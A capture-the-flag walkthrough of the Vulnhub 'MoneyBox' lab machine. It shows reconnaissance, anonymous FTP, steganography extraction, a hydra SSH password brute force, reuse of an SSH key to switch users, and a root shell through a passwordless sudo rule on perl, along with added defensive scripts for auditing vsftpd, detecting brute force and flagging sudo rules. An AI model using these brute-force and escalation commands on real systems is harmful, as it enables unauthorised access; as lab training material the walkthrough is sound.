Vulnhub: Monkeybox detailed walkthrough (a different path to a shell)


Monkeybox

Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:10:8b:6f      1      60  PCS Systemtechnik GmbH
 192.168.56.244  08:00:27:ce:e9:a8      1      60  PCS Systemtechnik GmbH
Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.244.

Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.244 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-05 21:45 EDT
Nmap scan report for bogon (192.168.56.244)
Host is up (0.00021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.230
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:CE:E9:A8 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.33 seconds
The Nmap results show three open ports on the target: 21 (FTP), 22 (SSH) and 80 (HTTP).

Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ ftp 192.168.56.244
Connected to 192.168.56.244.
220 (vsFTPd 3.0.3)
Name (192.168.56.244:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||6250|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Feb 26  2021 .
drwxr-xr-x    2 0        0            4096 Feb 26  2021 ..
-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
229 Entering Extended Passive Mode (|||34432|)
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
100% |****************************************************************************************************************|  1068 KiB    7.82 MiB/s    00:00 ETA
226 Transfer complete.
1093656 bytes received in 00:00 (7.79 MiB/s)
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||17931|)
550 Permission denied.

  • The target allows anonymous FTP access
  • Anonymous users are not allowed to upload files
  • This FTP server version has no known exploitable vulnerability
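The three findings above map directly onto vsftpd configuration directives. The following audit script is an added example, not code from the original post: it parses a constructed vsftpd.conf, checks the effective value of each directive against a small checklist of this example's own making (directive names and defaults follow vsftpd.conf(5)), and renders a hardened copy with every checked directive set explicitly.

```python
"""Audit a vsftpd configuration for the exposure observed above (anonymous
login allowed, plain-text control and data channels).

Added example, not code from the original post. SAMPLE_CONF is a constructed
vsftpd.conf; POLICY is this example's own checklist. Directive names and the
values vsftpd assumes when a directive is absent follow vsftpd.conf(5).
"""

# Directive -> (expected value, why it matters). Constructed checklist.
POLICY = {
    "anonymous_enable": ("NO", "anonymous logins expose every file under the FTP root"),
    "anon_upload_enable": ("NO", "anonymous uploads let anyone drop files on the server"),
    "anon_mkdir_write_enable": ("NO", "anonymous users could create directories"),
    "ssl_enable": ("YES", "without TLS, credentials and data travel in clear text"),
}

# Values vsftpd assumes when a directive is absent (vsftpd.conf(5) defaults).
DEFAULTS = {
    "anonymous_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "ssl_enable": "NO",
}

# Constructed configuration consistent with the Nmap ftp-anon result above.
SAMPLE_CONF = """\
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
dirmessage_enable=YES
# ssl_enable deliberately left unset: vsftpd then falls back to NO
"""


def parse_vsftpd_conf(text):
    """Return {directive: value} for the non-comment lines of a vsftpd.conf."""
    config = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        config[key.strip()] = value.strip()
    return config


def effective(config, directive):
    """Value vsftpd will use: the configured one, else the documented default."""
    return config.get(directive, DEFAULTS.get(directive))


def audit(config):
    """List (directive, effective value, expected value, reason) for every
    directive whose effective value violates POLICY."""
    findings = []
    for directive, (expected, reason) in POLICY.items():
        current = effective(config, directive)
        if current != expected:
            findings.append((directive, current, expected, reason))
    return findings


def hardened(config):
    """Copy of the config with every POLICY directive set explicitly, so the
    outcome no longer depends on compiled-in defaults."""
    fixed = dict(config)
    for directive, (expected, _reason) in POLICY.items():
        fixed[directive] = expected
    return fixed


def render(config):
    """Serialise a config dict back to vsftpd.conf syntax (no spaces around '=')."""
    return "".join(f"{key}={value}\n" for key, value in config.items())


if __name__ == "__main__":
    weak = parse_vsftpd_conf(SAMPLE_CONF)
    for directive, current, expected, reason in audit(weak):
        print(f"[!] {directive}={current} (expected {expected}): {reason}")
    print("--- hardened ---")
    print(render(hardened(weak)), end="")
```

Two points the audit makes visible: a missing `ssl_enable` line is a finding, because vsftpd treats absence as NO; and `write_enable=YES` on its own does not grant anonymous uploads, since `anon_upload_enable` defaults to NO, which is exactly the `550 Permission denied` the `put` above ran into.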
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ steghide extract -sf trytofind.jpg
Enter passphrase:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ stegseek trytofind.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.72% (133.1 MB)
[!] error: Could not find a valid passphrase.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ exiftool trytofind.jpg
ExifTool Version Number         : 12.44
File Name                       : trytofind.jpg
Directory                       : .
File Size                       : 1094 kB
File Modification Date/Time     : 2021:02:26 04:48:17-05:00
File Access Date/Time           : 2023:04:05 21:48:25-04:00
File Inode Change Date/Time     : 2023:04:05 21:48:25-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Image Width                     : 3984
Image Height                    : 2988
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 3984x2988
Megapixels                      : 11.9

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ binwalk -e trytofind.jpg
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
Analysis of the file downloaded over FTP turned up nothing of value.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ gobuster dir -u http://192.168.56.244 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.244
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2023/04/05 21:53:48 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 621]
/blogs                (Status: 301) [Size: 316] [--> http://192.168.56.244/blogs/]
Progress: 222012 / 1323366 (16.78%)^C
[!] Keyboard interrupt detected, terminating.
gobuster identified the directory /blogs.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ curl http://192.168.56.244/blogs/
<html>
<head><title>MoneyBox</title></head>
<body>
    <h1>I'm T0m-H4ck3r</h1>
        <p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
        <p>If You Want Hint For Next Step......?<p>
</body>
</html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ curl http://192.168.56.244/S3cr3t-T3xt/
<html>
<head><title>MoneyBox</title></head>
<body>
    <h1>There is Nothing In this Page.........</h1>
</body>
</html>
<!..Secret Key 3xtr4ctd4t4 >
Could this be the passphrase for the image?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ steghide extract -sf trytofind.jpg
Enter passphrase:
wrote extracted data to "data.txt".

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ ls -alh
total 1.1M
drwxr-xr-x  2 kali kali 4.0K Apr  5 22:00 .
drwxr-xr-x 19 kali kali 4.0K Apr  5 21:43 ..
-rw-r--r--  1 kali kali  136 Apr  5 22:00 data.txt
-rw-r--r--  1 root root 1.5K Apr  5 21:45 nmap_full_scan
-rw-r--r--  1 kali kali   12 Apr  5 21:48 test.txt
-rw-r--r--  1 kali kali 1.1M Feb 26  2021 trytofind.jpg

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ cat data.txt
Hello.....  renu
      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
This tells us two things:

  • The username is renu
  • The password is weak and can be cracked
It is not clear whether this applies to FTP or SSH, so try SSH first.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.244
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-05 22:01:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.244:22/
[22][ssh] host: 192.168.56.244   login: renu   password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
The password for user renu was recovered.
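On the server side, a run like the hydra one above leaves a dense trail of `Failed password` lines in sshd's auth log, typically followed by one `Accepted password` for the same account and source. The detector below is an added example, not code from the original post: it parses constructed lines in the format Debian's sshd writes to /var/log/auth.log, keeps a sliding window of failures per source address, and raises one alert when a source crosses a failure threshold and a second, higher-value alert when a login from that source then succeeds while the burst is still within the window. The threshold, window and log lines are this example's own choices.

```python
"""Detect SSH password guessing from sshd auth-log lines, the server-side
footprint of the hydra run shown above.

Added example, not part of the original post. The log lines are constructed
to resemble Debian's /var/log/auth.log; threshold and window are this
example's own choices.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd's "Failed password" / "Accepted password" messages (password auth only).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)

# Constructed sample: a guessing burst from 192.168.56.230 (the scanning host
# seen in the Nmap ftp-syst output) that ends in a successful login, plus one
# ordinary mistyped password from another address.
SAMPLE_AUTH_LOG = """\
Apr  5 22:01:46 MoneyBox sshd[1201]: Failed password for renu from 192.168.56.230 port 50122 ssh2
Apr  5 22:01:46 MoneyBox sshd[1203]: Failed password for renu from 192.168.56.230 port 50124 ssh2
Apr  5 22:01:47 MoneyBox sshd[1205]: Failed password for renu from 192.168.56.230 port 50126 ssh2
Apr  5 22:01:47 MoneyBox sshd[1207]: Failed password for renu from 192.168.56.230 port 50128 ssh2
Apr  5 22:01:48 MoneyBox sshd[1209]: Failed password for renu from 192.168.56.230 port 50130 ssh2
Apr  5 22:01:48 MoneyBox sshd[1211]: Failed password for renu from 192.168.56.230 port 50132 ssh2
Apr  5 22:01:49 MoneyBox sshd[1213]: Accepted password for renu from 192.168.56.230 port 50134 ssh2
Apr  5 22:05:10 MoneyBox sshd[1250]: Failed password for lily from 192.168.56.1 port 40000 ssh2
Apr  5 22:05:15 MoneyBox sshd[1252]: Accepted password for lily from 192.168.56.1 port 40002 ssh2
"""


def parse_line(line, year=2023):
    """Return a dict for a password-auth event, or None for any other line.
    syslog timestamps carry no year, so the caller supplies one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_password_guessing(lines, threshold=5, window=timedelta(seconds=60), year=2023):
    """Sliding-window detector over auth-log lines (in file order).

    Emits "password_guessing" once per source IP when it reaches `threshold`
    failures inside `window`, and "success_after_guessing" if a login from
    that IP succeeds while at least `threshold` failures are still in window.
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    reported = set()              # ips whose current burst was already reported
    alerts = []
    for line in lines:
        ev = parse_line(line, year)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        while q and ev["ts"] - q[0] > window:
            q.popleft()               # drop failures that aged out of the window
        if not q:
            reported.discard(ev["ip"])  # burst expired; a new one may be reported
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["ip"] not in reported:
                reported.add(ev["ip"])
                alerts.append({"type": "password_guessing", "ip": ev["ip"],
                               "user": ev["user"], "failures": len(q), "ts": ev["ts"]})
        elif len(q) >= threshold:
            alerts.append({"type": "success_after_guessing", "ip": ev["ip"],
                           "user": ev["user"], "failures": len(q), "ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_password_guessing(SAMPLE_AUTH_LOG.splitlines()):
        print(f"{alert['ts']} {alert['type']:24} {alert['ip']} user={alert['user']} "
              f"failures={alert['failures']}")
```

Five failures in a minute is a deliberately low bar chosen so the constructed sample trips it; hydra with its default 16 parallel tasks produces far more than that per second, so in practice the first alert fires within the first second of the run. The single failure from 192.168.56.1 never reaches the threshold, and the successful lily login is therefore not flagged.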
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ ssh renu@192.168.56.244
renu@192.168.56.244's password:
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
renu@MoneyBox:~$ id
uid=1001(renu) gid=1001(renu) groups=1001(renu)
renu@MoneyBox:~$ ls -alh
total 40K
drwxr-xr-x 5 renu renu 4.0K Feb 26  2021 .
drwxr-xr-x 4 root root 4.0K Feb 26  2021 ..
-rw------- 1 renu renu  642 Feb 26  2021 .bash_history
-rw-r--r-- 1 renu renu  220 Apr 17  2019 .bash_logout
-rw-r--r-- 1 renu renu 3.5K Apr 17  2019 .bashrc
drwxr-xr-x 3 root root 4.0K Feb 26  2021 ftp
drwxr-xr-x 3 renu renu 4.0K Feb 26  2021 .local
-rw-r--r-- 1 renu renu  807 Apr 17  2019 .profile
drwx------ 2 renu renu 4.0K Feb 26  2021 .ssh
-rw-r--r-- 1 renu renu   64 Feb 26  2021 user1.txt
renu@MoneyBox:~$ cat user1.txt
Yes...!
You Got it User1 Flag
==> us3r1{F14g:0ku74tbd3777y4}
renu@MoneyBox:~$ cat .bash_history
cler
ls
ls -la
cd /home
ls
clear
cd
ls
ls -la
exit
clear
ls
ls -la
cd /home
ls
cd lily
ls
ls -la
clear
cd
clear
ssh-keygen -t rsa
clear
cd .ssh
ls
ssh-copy-id lily@192.168.43.80
clear
cd
cd -
ls -l
chmod 400 id_rsa
ls -l
ssh -i id_rsa lily@192.168.43.80
clear
ssh -i id_rsa lily@192.168.43.80
cd
clear
cd .ssh/
ls
ssh -i id_rsa lily@192.168.43.80
su lily
clear
cd
sudo apt install openssh
sudo apt update
sudo apt install openssh-server
sudo service ssh start
sudo service ssh status
clear
cd /etc/
ls
cd ssh
ls
nano ssh_config
ls
nano sshd_config
clear
cd
ls
ls -la
chsh bash
chsh
clear
su root
clear
sudo apt install openssh
su root
exit
renu's shell history shows that renu generated an SSH key pair and installed its public half into lily's account with ssh-copy-id, so the private key in ~/.ssh/id_rsa can be used to log in as the other user, lily.
renu@MoneyBox:~$ cd /home
renu@MoneyBox:/home$ ls -alh
total 16K
drwxr-xr-x  4 root root 4.0K Feb 26  2021 .
drwxr-xr-x 18 root root 4.0K Feb 25  2021 ..
drwxr-xr-x  4 lily lily 4.0K Feb 26  2021 lily
drwxr-xr-x  5 renu renu 4.0K Feb 26  2021 renu
renu@MoneyBox:/home$ cd renu/.ssh/
renu@MoneyBox:~/.ssh$ ssh -i id_rsa lily@192.168.56.244
The authenticity of host '192.168.56.244 (192.168.56.244)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.244' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$ id
uid=1000(lily) gid=1000(lily) groups=1000(lily),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
lily@MoneyBox:~$ cat user2.txt
Yeah.....
You Got a User2 Flag
==> us3r{F14g:tr5827r5wu6nklao}
That gives the second flag.

Privilege escalation
lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
Escalate privileges using the method documented on the GTFOBins site:
lily@MoneyBox:~$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# cd /root
# ls -alh
total 28K
drwx------  3 root root 4.0K Feb 26  2021 .
drwxr-xr-x 18 root root 4.0K Feb 25  2021 ..
-rw-------  1 root root 2.1K Feb 26  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Feb 25  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  228 Feb 26  2021 .root.txt
# cat .root.txt
Congratulations.......!
You Successfully completed MoneyBox
Finally The Root Flag
    ==> r00t{H4ckth3p14n3t}
I'm Kirthik-KarvendhanT
    It's My First CTF Box

instagram : ____kirthik____
See You Back....

#
This yields a root shell and the root flag.
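The root cause of the escalation is a sudoers rule that lets an unprivileged user run an interpreter as root without a password. The script below is an added example, not code from the original post: it parses the text `sudo -l` prints (the first constructed sample is the lily output above, the second is a made-up rule set with several commands), splits each rule into run-as user, tags and individual commands, and flags the ones whose command is an interpreter or editor that can hand back a shell. The list of such binaries is this example's own short GTFOBins-style selection and is not exhaustive.

```python
"""Flag sudo rules of the kind that enabled the escalation above.

Added example, not part of the original post. SHELL_CAPABLE is a short,
constructed GTFOBins-style list; SAMPLE_SUDO_L reproduces the lily output
from the walkthrough and SAMPLE_SUDO_L_MULTI is made up for this example.
"""
import os
import re

# Binaries that can hand the caller a shell or run arbitrary code when run
# via sudo. Constructed, deliberately short; extend from the real catalogue.
SHELL_CAPABLE = {
    "sh", "bash", "dash", "zsh", "perl", "python", "python2", "python3",
    "ruby", "php", "node", "lua", "awk", "gawk", "find", "vim", "vi",
    "nano", "less", "more", "man", "env", "tar", "zip",
}

HEADER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands on (?P<host>\S+):$")
# "(runas) TAG: TAG: cmd1, cmd2" as printed by `sudo -l`.
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

SAMPLE_SUDO_L = """\
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
"""

# Constructed: a mixed rule set to show the per-command split.
SAMPLE_SUDO_L_MULTI = """\
User ops may run the following commands on MoneyBox:
    (root) NOPASSWD: /sbin/reboot, /usr/bin/python3
    (ALL : ALL) /sbin/shutdown
"""


def parse_sudo_l(text):
    """Return one dict per command granted in `sudo -l` output."""
    user, in_rules, rules = None, False, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        header = HEADER_RE.match(line)
        if header:
            user, in_rules = header["user"], True
            continue
        if not in_rules:
            continue                      # skip the "Matching Defaults" section
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            binary = os.path.basename(cmd.split()[0]) if cmd != "ALL" else "ALL"
            rules.append({
                "user": user,
                "runas": m["runas"].strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd,
                "shell_capable": cmd == "ALL" or binary in SHELL_CAPABLE,
            })
    return rules


def risky_rules(rules):
    """Rules that grant a shell-capable binary; NOPASSWD raises the severity."""
    findings = []
    for rule in rules:
        if rule["shell_capable"]:
            findings.append(dict(rule, severity="critical" if rule["nopasswd"] else "high"))
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_SUDO_L, SAMPLE_SUDO_L_MULTI):
        for f in risky_rules(parse_sudo_l(sample)):
            print(f"[{f['severity']}] {f['user']} -> ({f['runas']}) "
                  f"{'NOPASSWD ' if f['nopasswd'] else ''}{f['command']}")
```

The fix on the host side is to remove such rules from /etc/sudoers (or the drop-in under /etc/sudoers.d) and, where a script genuinely needs elevated rights, to grant sudo on a fixed, non-writable wrapper with its arguments pinned rather than on the interpreter itself. In the second sample, `/sbin/reboot` and `/sbin/shutdown` are not flagged: they do not spawn a shell, and a password-protected rule for them is an ordinary operator grant.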

Author: 王海鱼